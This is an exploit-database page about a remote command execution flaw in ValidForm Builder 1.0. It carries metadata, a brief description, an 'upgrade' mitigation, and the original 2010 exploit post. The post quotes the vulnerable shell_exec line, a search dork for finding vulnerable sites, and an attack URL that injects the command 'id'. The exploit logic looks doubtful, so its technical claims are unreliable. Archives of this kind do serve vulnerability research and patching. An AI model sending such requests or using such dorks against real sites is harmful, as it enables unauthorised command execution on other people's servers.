header-logo
Suggest Exploit
vendor:
ValidForm Builder
by:
HackeR aRaR
9,3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: ValidForm Builder
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: //a:validformbuilder:validformbuilder:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

ValidForm Builder script Remote Command Execution

A vulnerability exists in the ValidForm Builder script, which allows an attacker to execute arbitrary commands on the vulnerable system. The vulnerability is due to insufficient sanitization of user-supplied input in the 'shell_exec' function in the 'class.phpcaptcha.php' file. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in arbitrary command execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of ValidForm Builder script.
Source

Exploit-DB raw data:

# Exploit Title:   ValidForm Builder script Remote Command Execution
Vulnerability
# Date: 2010/07/23
# Author: HackeR aRaR
# Email: y.0@hotmail.de
# My Sites : www.vbspiders.com
# Script home: http://www.phpgalleryscript.org
# download Script:
http://validformbuilder.googlecode.com/files/validformbuilder_v.1.0.zip
# Tested on: Windows
# Team hacker:HaCkEr aRaR & ViRuS Qalaa >>>X-MaN HaCk3r TeaM
#ViRuS Qalaa:em9@live.com <Qalaa%3Aem9@live.com>
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
shell_exec("$this->sFlitePath -t \"$sText\" -o
$this->sAudioPath$sFile.wav");
/libraries/ValidForm/class.phpcaptcha.php
Line:466

----exploit----
Dork: "PHP Gallery © 2010 PHP Weby hostgator coupon"

http://{localhost}/{path}/libraries/ValidForm/class.phpcaptcha.php?this=id<http://%7blocalhost%7d/%7Bpath%7D/libraries/ValidForm/class.phpcaptcha.php?this=id>

---------greatz----------
Greatz to :
ViRuS Qalaa,VoLc4n0

and My friends Others and My friends in MSN
EnJoY o_O

Navigation

Suggest Exploit

Services By CQR